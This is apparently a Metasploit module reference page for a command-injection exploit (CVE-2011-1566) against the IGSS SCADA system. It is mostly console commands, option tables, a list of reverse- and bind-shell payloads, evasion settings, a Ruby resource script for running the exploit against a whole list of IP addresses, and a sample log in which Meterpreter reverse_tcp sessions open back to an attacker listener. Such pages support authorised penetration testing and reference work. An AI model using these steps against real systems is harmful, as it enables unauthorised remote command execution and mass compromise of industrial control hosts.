Interactive Graphical SCADA System Remote Command Injection - Metasploit


This page contains detailed information about how to use the exploit/windows/scada/igss_exec_17 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Interactive Graphical SCADA System Remote Command Injection
Module: exploit/windows/scada/igss_exec_17
Source code: modules/exploits/windows/scada/igss_exec_17.rb
Disclosure date: 2011-03-21
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): 12397
List of CVEs: CVE-2011-1566

This module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using igss_exec_17 against a single host

Normally, you can use exploit/windows/scada/igss_exec_17 this way:

msf > use exploit/windows/scada/igss_exec_17
msf exploit(igss_exec_17) > show targets
    ... a list of targets ...
msf exploit(igss_exec_17) > set TARGET target-id
msf exploit(igss_exec_17) > show options
    ... show and set options ...
msf exploit(igss_exec_17) > exploit

Using igss_exec_17 against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your igss_exec_17 will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/scada/igss_exec_17")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the windows/scada/igss_exec_17 exploit module looks in the msfconsole:

msf6 > use exploit/windows/scada/igss_exec_17

[*] No payload configured, defaulting to cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/scada/igss_exec_17) > show info

       Name: Interactive Graphical SCADA System Remote Command Injection
     Module: exploit/windows/scada/igss_exec_17
   Platform: Windows
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-03-21

Provided by:
  Luigi Auriemma
  MC <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   12397            yes       The target port (TCP)

Payload information:
  Space: 153

Description:
  This module abuses a directory traversal flaw in Interactive 
  Graphical SCADA System v9.00. In conjunction with the traversal 
  flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may 
  be able to execute arbitrary system commands.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2011-1566
  OSVDB (72349)
  http://aluigi.org/adv/igss_8-adv.txt

Module Options


This is a complete list of options available in the windows/scada/igss_exec_17 exploit:

msf6 exploit(windows/scada/igss_exec_17) > show options

Module options (exploit/windows/scada/igss_exec_17):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   12397            yes       The target port (TCP)

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.204.3    yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

Advanced Options


Here is a complete list of advanced options supported by the windows/scada/igss_exec_17 exploit:

msf6 exploit(windows/scada/igss_exec_17) > show advanced

Module advanced options (exploit/windows/scada/igss_exec_17):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/windows/powershell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   HandlerSSLCert                               no        Path to a SSL certificate in unified PEM format
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/scada/igss_exec_17 module can exploit:

msf6 exploit(windows/scada/igss_exec_17) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/scada/igss_exec_17 exploit:

msf6 exploit(windows/scada/igss_exec_17) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/windows/adduser                                  normal  No     Windows Execute net user /ADD CMD
   1   payload/cmd/windows/bind_perl                                normal  No     Windows Command Shell, Bind TCP (via Perl)
   2   payload/cmd/windows/bind_perl_ipv6                           normal  No     Windows Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/windows/bind_ruby                                normal  No     Windows Command Shell, Bind TCP (via Ruby)
   4   payload/cmd/windows/download_eval_vbs                        normal  No     Windows Executable Download and Evaluate VBS
   5   payload/cmd/windows/download_exec_vbs                        normal  No     Windows Executable Download and Execute (via .vbs)
   6   payload/cmd/windows/generic                                  normal  No     Windows Command, Generic Command Execution
   7   payload/cmd/windows/powershell_bind_tcp                      normal  No     Windows Interactive Powershell Session, Bind TCP
   8   payload/cmd/windows/powershell_reverse_tcp                   normal  No     Windows Interactive Powershell Session, Reverse TCP
   9   payload/cmd/windows/reverse_perl                             normal  No     Windows Command, Double Reverse TCP Connection (via Perl)
   10  payload/cmd/windows/reverse_ruby                             normal  No     Windows Command Shell, Reverse TCP (via Ruby)
   11  payload/generic/custom                                       normal  No     Custom Payload
   12  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   13  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the windows/scada/igss_exec_17 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/scada/igss_exec_17) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Luigi Auriemma
  • MC

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.